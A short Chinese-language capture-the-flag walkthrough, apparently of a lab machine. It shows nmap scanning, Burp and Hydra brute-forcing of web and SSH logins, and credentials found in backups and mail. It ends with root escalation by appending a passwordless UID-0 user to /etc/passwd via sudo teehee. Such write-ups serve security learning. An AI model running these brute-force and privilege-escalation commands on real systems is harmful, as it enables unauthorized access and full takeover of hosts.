Nmap 扫描主机,nmap -sS 192.168.6.0/24
访问服务是一个登陆页面,使用 burp 爆破用户名为 admin
,密码为 happy
/home/jim/backups
下发现 old-passwords.bak
读取一下
使用 hydra 爆破 ssh:hydra -l jim -P password.txt 192.168.6.130 ssh
用户名:jim,密码:jibril04
登陆后发现 mbox 和 test.sh
猜测可能是邮件服务,进入目录 /var/mail
发现用户名:Charles 密码:^xHhA&hvim0y
切换到 charles,查看可以运行的命令
echo "superuser::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
写入一个 root 权限的用户到 /etc/passwd,提权成功
参数解释:
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
获取到 flag